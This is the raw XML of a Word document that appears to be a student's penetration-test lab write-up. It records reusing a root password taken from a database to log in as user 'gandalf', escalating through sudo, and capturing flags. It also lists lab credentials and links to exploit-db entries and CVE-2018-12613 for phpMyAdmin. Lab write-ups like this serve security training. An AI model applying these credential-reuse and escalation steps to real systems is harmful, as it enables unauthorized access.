    <w:p w14:paraId="4CA5E113" w14:textId="5520E3D2" w:rsidR="00494D4F" w:rsidRDefault="00494D4F" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="45858566" w14:textId="7DFC2A28" w:rsidR="009E3684" w:rsidRDefault="00494D4F" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FCB6CEE" wp14:editId="123C7211">
            <wp:extent cx="5943600" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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FDC0" w14:textId="77777777" w:rsidR="008F1AE7" w:rsidRDefault="008F1AE7" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="7FD9D55F" w14:textId="258A5322" w:rsidR="00DC5F7B" w:rsidRDefault="009E3684" w:rsidP="00FB5FBB">
      <w:r>
        <w:t xml:space="preserve">After, </w:t>
      </w:r>
      <w:r w:rsidR="00DC5F7B">
        <w:t>checked “/home” and found a user named “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC5F7B">
        <w:t>gandalf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC5F7B">
        <w:t xml:space="preserve">”, tried the root password gained from </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the database and it successfully authenticated. Checked the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gandalf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t xml:space="preserve">users’ </w:t>
      </w:r>
      <w:r>
        <w:t>groups with “id”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so escalation to root was possible. Screenshot shows process and user/root fla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E3684" w14:paraId="6C247F77" w14:textId="77777777" w:rsidTr="009E3684">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB32F26" w14:textId="42C2DE3D" w:rsidR="009E3684" w:rsidRPr="00900CFB" w:rsidRDefault="009E3684" w:rsidP="00FB5FBB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00900CFB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gandalf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00900CFB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> user username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1724718A" w14:textId="672F5392" w:rsidR="009E3684" w:rsidRPr="00900CFB" w:rsidRDefault="009E3684" w:rsidP="00FB5FBB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00900CFB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gandalf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00900CFB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> user password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E3684" w14:paraId="49F6A224" w14:textId="77777777" w:rsidTr="009E3684">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F3AEB3F" w14:textId="4E3FA1A7" w:rsidR="009E3684" w:rsidRDefault="009E3684" w:rsidP="00FB5FBB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gandalf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="225FA2D6" w14:textId="5142BE31" w:rsidR="009E3684" w:rsidRDefault="009E3684" w:rsidP="00FB5FBB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gandalfthewhite</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39F1B6E5" w14:textId="77777777" w:rsidR="00900CFB" w:rsidRDefault="00900CFB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="12E14E10" w14:textId="272B0F2B" w:rsidR="009E3684" w:rsidRPr="00FB5FBB" w:rsidRDefault="009E3684" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34C61EA2" wp14:editId="7232B763">
            <wp:extent cx="5943600" cy="3953510"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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3684" w:rsidRPr="00FB5FBB" w:rsidSect="007D5B53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09C89" w14:textId="77777777" w:rsidR="000734E6" w:rsidRDefault="000734E6" w:rsidP="00FB5FBB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="615236DF" w14:textId="77777777" w:rsidR="000734E6" w:rsidRDefault="000734E6" w:rsidP="00FB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37023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F4322EC" w14:textId="5E10A107" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB">
            <w:pPr>
              <w:pStyle w:val="Footer"/>
            </w:pPr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fldSimple w:instr=" NUMPAGES  ">
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>2</w:t>
              </w:r>
            </w:fldSimple>
          </w:p>
        </w:sdtContent>
      </w:sdt>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="7112899A" w14:textId="77777777" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5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FF8BA" w14:textId="77777777" w:rsidR="000734E6" w:rsidRDefault="000734E6" w:rsidP="00FB5FBB">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="652923BD" w14:textId="77777777" w:rsidR="000734E6" w:rsidRDefault="000734E6" w:rsidP="00FB5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86D3" w14:textId="505DD530" w:rsidR="007D5B53" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111B292D" wp14:editId="5A076E46">
          <wp:extent cx="5935980" cy="518160"/>
          <wp:effectExtent l="0" t="0" r="762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C86875" w14:textId="77777777" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5F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53"/>
    <w:rsid w:val="000653EC"/>
    <w:rsid w:val="000734E6"/>
    <w:rsid w:val="00085B58"/>
    <w:rsid w:val="000F358C"/>
    <w:rsid w:val="00227658"/>
    <w:rsid w:val="00494D4F"/>
    <w:rsid w:val="004E4D9B"/>
    <w:rsid w:val="005C565D"/>
    <w:rsid w:val="00715EBF"/>
    <w:rsid w:val="007229B6"/>
    <w:rsid w:val="007D5B53"/>
    <w:rsid w:val="007F34F8"/>
    <w:rsid w:val="007F4B48"/>
    <w:rsid w:val="00814189"/>
    <w:rsid w:val="008F1AE7"/>
    <w:rsid w:val="00900CFB"/>
    <w:rsid w:val="009E3684"/>
    <w:rsid w:val="00BE3375"/>
    <w:rsid w:val="00BF382D"/>
    <w:rsid w:val="00D17785"/>
    <w:rsid w:val="00D22B74"/>
    <w:rsid w:val="00D41BC0"/>
    <w:rsid w:val="00DC5F7B"/>
    <w:rsid w:val="00DD29EB"/>
    <w:rsid w:val="00E47099"/>
    <w:rsid w:val="00E81C13"/>
    <w:rsid w:val="00FB5FBB"/>
    <w:rsid w:val="00FF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E11FA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7FB6D5D3-A5AC-4171-A4DD-2C4A343C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FBB"/>
    <w:rPr>
      <w:rFonts w:ascii="Californian FB" w:hAnsi="Californian FB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82D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F2C4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82D"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="F2C4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B53"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D5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B53"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF382D"/>
    <w:rPr>
      <w:rFonts w:ascii="Californian FB" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Californian FB" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="F2C40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715EB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5E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15EB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382D"/>
    <w:rPr>
      <w:rFonts w:ascii="Californian FB" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Californian FB" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="F2C40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B5FBB"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00FF2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F276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F276C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E47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exploit-db.com/exploits/44924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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2018-12613" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.5.28/phpmyadmin/sql.php?db=mysql&amp;table=user&amp;pos=0" TargetMode="External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exploit-db.com/exploits/50457" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50457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exploit-db.com/exploits/44928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47669-B2AC-46C2-A425-44F447AB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oe, Oliver</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mustoe, Oliver</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <cp:lastPrinted>2022-11-19T22:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-19T17:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-19T22:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>